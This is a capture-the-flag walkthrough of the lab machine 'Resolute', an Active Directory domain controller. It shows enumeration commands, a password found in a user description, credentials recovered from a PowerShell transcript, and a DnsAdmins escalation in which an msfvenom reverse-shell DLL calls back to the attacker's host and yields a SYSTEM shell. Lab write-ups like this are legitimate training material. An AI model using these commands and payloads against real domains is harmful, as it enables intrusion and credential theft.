Resolute is a medium difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM.
Enumeration
Scope
IP Address: 10.10.10.169
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-11 02:24:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-11T02:24:32
|_ start_date: 2024-07-11T02:18:59
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h27m07s, deviation: 4h02m31s, median: 7m06s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-07-10T19:24:30-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
* Open ports: 53,88,135,139,389,445,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - KERBEROS - LDAP - RPC - SMB - winRM
* Versions: Windows Server 2016 Standard 14393
* Important Notes: Domain: megabank.local - - FQDN: Resolute.megabank.local
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
<snip>
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>
Initial Access
When I run out all the options I know to get a foothold, I decided to query the users info I got from rpccclient, maybe a password exists in description field or something
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ for rid in $(cat rid.lst); do rpcclient -U "%" $ip -c "queryuser $rid" | tee -a rpc.output;done
<snip>
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
<snip>
we found the password Welcome123!, Let's confirm access with user marko
When I landed on windows box joined to Active Directory, I run bloodhound.py to collect info about the domain and provide it to bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound-python -u 'melanie' -p 'Welcome123!' -ns $ip -d megabank.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 28 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 20S
Start neo4j database and then run bloodhound to open GUI
provide the data collected as zip file to bloodhound
user ryan has a profile on the box, Let's enumerate him in bloodhound
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
Click on unrolled group membership to see nested group membership
ryan is a member of DNSADMINS group via nested group membership, So If I could takeover this account, the path to Domain Admins is clear
I found no database, PowerShell history file, no stored credentials or scripts located somewhere however, I learned a trick before that I always make on windows machine which is looking for hidden files as I do in Linux
*Evil-WinRM* PS C:\> ls -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 7/10/2024 7:18 PM 402653184 pagefile.sys
PSTranscripts is not a standard directory, Let's explore it
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
That .txt file looks very interesting, Let's see
*Evil-WinRM* PS C:\> type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
<snip>
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
<snip>
we can then abuse our membership in DNS Admins group, we can alter the .dll of dns service running as SYSTEM to add ourselves in Domain Admins group or get a reverse shell as SYSTEM
Before we start the attack, Let's first confirm we have control on dns service
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe sdshow DNS
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
The object SID that has control of dns service is S-1-5-21-1392959593-3013219662-3596683436-1105 I look at bloodhound to get the SID of user ryan and see if the two SIDs match each other
So, we have control of DNS service, Let's start the attack.
Generate malicious dll to add ryan to domain admins
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=8443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
Stop and start dns service to get the dll executed
sc.exe stop dns
sc.exe start dns
My exploit failed for some reason but after few moments, I realized that there was a script that revert everything and delete my payload, So I created a one-linear command to get my payload executed before it was deleted
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
[*] Sending stage (201798 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.16.3:8443 -> 10.10.10.169:53631) at 2024-07-10 23:40:39 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2592 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator
C:\Users\Administrator>type Desktop\root.txt
2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Root Flag: 2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Reverst.ps1
This the script which was preventing us as it does the following:
Reset ryan, melanie and administrator password
Reset dns settings
We can see the plaintext password of administrator
